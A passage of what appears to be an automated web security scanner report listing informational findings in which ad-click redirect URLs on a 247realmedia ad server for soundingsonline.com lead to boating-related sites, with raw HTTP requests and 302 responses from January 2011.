Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/822911893/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/822911893/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/822911893/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:00:04 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.479. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/824392375/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/824392375/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/824392375/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/824392375/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.480. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/825907027/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/825907027/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/825907027/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/825907027/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:50:47 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.481. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/828468945/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/828468945/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/828468945/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/828468945/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:44:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.482. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/837487534/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/837487534/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/837487534/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/837487534/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:58:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.483. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/843686845/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/843686845/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/843686845/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/843686845/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:43:54 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.484. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/844694778/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/844694778/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/844694778/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/844694778/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:35 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.485. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/860655786/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/860655786/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/860655786/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/860655786/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:54:19 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.486. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/861795507/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/861795507/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/861795507/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/861795507/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:31:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.487. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/870635499/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/870635499/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/870635499/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/870635499/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.488. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/877352963/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/877352963/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/877352963/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/877352963/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:01:40 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.489. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/879719656/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/879719656/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/879719656/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/879719656/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:05:53 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.490. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/881866547/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/881866547/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/881866547/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/881866547/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:52:54 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.491. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/886342725/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/886342725/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/886342725/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/886342725/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:50:30 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.492. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/888728536/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/888728536/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/888728536/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/888728536/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
